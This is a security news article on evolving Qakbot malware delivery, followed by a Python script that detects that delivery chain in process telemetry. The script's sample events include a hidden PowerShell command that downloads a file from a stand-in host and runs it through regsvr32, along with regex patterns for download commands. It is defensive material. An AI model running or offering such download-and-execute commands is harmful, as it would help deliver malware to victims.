
New Qakbot Attacks are Much Stealthier and Effective than Ever

Qakbot info-stealing malware, which has been active since 2008, continues to evolve, adapt and implement new techniques to avoid detection by security systems.

What are its new techniques?

Researchers have spotted a significant rise in Qakbot infections, using improved tactics, over the past six months. The three notable techniques are as follows.
  • Evading detection by using ZIP file extensions and appealing file names in common formats.
  • Using Excel 4.0 macros to lure victims into opening malicious attachments that lead to Qakbot installation.
  • Dropping the payload under unfamiliar file extensions and changing the sequence of steps by inserting new stages between initial compromise, delivery, and final execution.

Other subtle techniques observed by researchers included obfuscating code and the use of multiple URLs to deliver the payload.

Using catchy names

The attackers are using several different file names to mask attachments created to deliver Qakbot. The file names used include a description, generated numbers, and dates.
  • These attached files carry common keywords related to finance and business operations that attempt to fool victims into believing they are regular business documents.
  • Additionally, the attackers used PowerShell to download the malicious code and switched from rundll32[.]exe to regsvr32[.]exe for loading the malicious payload to avoid detection.
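
The delivery chain described above (a lure-named document opened in Excel, PowerShell fetching the payload, and regsvr32/rundll32 loading it from a user-writable path under a non-.dll extension) gives a defender a few concrete things to hunt for in process-creation telemetry. The following is an added example, not code from the article or from any vendor; the event fields mimic Sysmon-style process-creation records, and all hostnames, users, paths and the URL are constructed for illustration.

```python
"""Heuristic detection for the Qakbot delivery chain described in the article.
Added example; event records, paths and the URL below are constructed."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DLL_LOADERS = {"regsvr32.exe", "rundll32.exe"}

# Locations an ordinary user can write to; a signed system binary loading a
# library from here is far more suspicious than loading from Program Files.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|programdata|windows\\temp|users\\public)\\",
    re.I,
)
# PowerShell download primitives commonly seen in maldoc-to-payload chains.
DOWNLOAD_CMDLETS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer|invoke-restmethod|\birm\b",
    re.I,
)
# "description + generated number + date" lure names, as the article describes.
LURE_NAME = re.compile(
    r"(invoice|payment|statement|contract|order|report|document|agreement|request)[ _-]?\d{2,}.*\d{4}",
    re.I,
)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted paths with spaces intact."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def analyze(events: list[ProcEvent]) -> list[str]:
    """Return one finding string per matched heuristic, in event order."""
    by_pid = {e.pid: e for e in events}
    findings: list[str] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""

        # 1. Office application spawning a script host or DLL loader.
        if pname in OFFICE_APPS and name in SCRIPT_HOSTS | DLL_LOADERS:
            findings.append(f"pid {e.pid}: {pname} spawned {name}")

        # 2. Lure-style document name handed to an Office application.
        if name in OFFICE_APPS and LURE_NAME.search(e.cmdline):
            findings.append(f"pid {e.pid}: lure-style document name opened by {name}")

        # 3. PowerShell invoking a download primitive.
        if name in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CMDLETS.search(e.cmdline):
            findings.append(f"pid {e.pid}: powershell download primitive")

        # 4. regsvr32/rundll32 loading from a user-writable path or a non-.dll file.
        if name in DLL_LOADERS:
            for tok in tokens(e.cmdline)[1:]:
                if "\\" not in tok:
                    continue  # switches like -s or /s, not paths
                if USER_WRITABLE.search(tok):
                    findings.append(f"pid {e.pid}: {name} loading from user-writable path: {tok}")
                if PureWindowsPath(tok).suffix.lower() != ".dll":
                    findings.append(f"pid {e.pid}: {name} loading non-.dll file: {tok}")
    return findings


# Constructed sample telemetry: one malicious chain plus two benign events.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\jdoe\Downloads\Invoice-48213_03.12.2021.xls"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('hxxp://placeholder.invalid/x','C:\Users\jdoe\AppData\Local\Temp\Pass.wbt')"),
    ProcEvent(400, 300, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe -s "C:\Users\jdoe\AppData\Local\Temp\Pass.wbt"'),
    ProcEvent(500, 100, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),   # benign install
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-ChildItem"),                             # benign admin use
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_EVENTS):
        print(line)
```

Each rule on its own produces false positives (administrators run PowerShell, installers call regsvr32), so the value is in the parent-child correlation: an Office process as the parent of a script host, and a loader whose argument lives under a user profile, should be weighted far above either condition alone.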

Conclusion

The recent Qakbot campaigns show a clear effort to enhance both the attacks and their stealth. To stay protected from such threats, organizations should train their employees on how to handle attachments and to avoid opening suspicious ones.
Publisher: Cyware